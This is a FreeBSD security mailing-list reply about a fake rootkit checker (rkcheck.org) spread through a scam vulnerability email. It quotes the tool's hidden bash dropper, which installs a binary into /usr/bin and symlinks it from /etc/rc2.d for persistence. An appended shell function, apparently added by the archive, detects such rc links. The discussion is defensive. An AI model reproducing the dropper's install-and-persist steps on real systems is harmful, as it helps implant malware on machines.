Date: Wed, 25 Feb 2015 16:41:19 -0400
From: Joseph Mingrone <jrm@ftfl.ca>
To: Philip Jocks <pjlists@netzkommune.com>
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 +0100")
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
Philip Jocks <pjlists@netzkommune.com> writes:

> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope nobody installed it anywhere; it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems.

Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful.

Joseph
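The quoted installer gains persistence by dropping a binary into /usr/bin and symlinking it from a SysV-style start directory (/etc/rc2.d/S98rsyncn -> /usr/bin/rrsyncn). The check below is an added example written for this archive page, not code from the thread or from chkrootkit: it walks /etc/rc*.d and reports any start link whose target is not a script under /etc/init.d, plus the specific dropped path named in the mail. It assumes the Debian-style rc?.d/init.d layout the dropper targets (FreeBSD has no /etc/rc2.d, so on FreeBSD only the /usr/bin/rrsyncn check applies); the optional root argument lets it run over a mounted or constructed tree instead of the live system.

```shell
#!/bin/sh
# audit_rc_links [ROOT]
#   Report SysV rc start links that do not point into /etc/init.d, and the
#   binary path the quoted dropper installs. Exit status 0 = nothing found,
#   1 = at least one finding. ROOT (default empty = live system) is prefixed
#   to every path so a copied or mounted tree can be inspected offline.
audit_rc_links() {
    root="${1:-}"
    found=0

    for link in "$root"/etc/rc*.d/S*; do
        # skip the literal glob pattern when no rc directory exists
        [ -e "$link" ] || [ -L "$link" ] || continue
        if [ -L "$link" ]; then
            target=$(readlink "$link")
            case "$target" in
                ../init.d/*|/etc/init.d/*)
                    ;;   # conventional start link, nothing to report
                *)
                    printf 'suspicious rc link: %s -> %s\n' "$link" "$target"
                    found=1
                    ;;
            esac
        else
            # a regular file (or directory) in rc?.d is itself unusual
            printf 'non-symlink rc entry: %s\n' "$link"
            found=1
        fi
    done

    # path taken from the dropper script quoted in the mail
    for ioc in "$root"/usr/bin/rrsyncn; do
        if [ -e "$ioc" ] || [ -L "$ioc" ]; then
            printf 'dropped binary present: %s\n' "$ioc"
            found=1
        fi
    done

    return $found
}

# Invoke as:  sh audit_rc.sh --run            (live system)
#             sh audit_rc.sh --run /mnt/img   (mounted or copied tree)
if [ "${1-}" = "--run" ]; then
    audit_rc_links "${2-}"
fi
```

The target is compared as a string rather than resolved, so a dangling link (binary already removed, link left behind) is still reported; the exit status makes the function usable from a cron job or a host-check wrapper.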
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?86bnkhyb9s.fsf>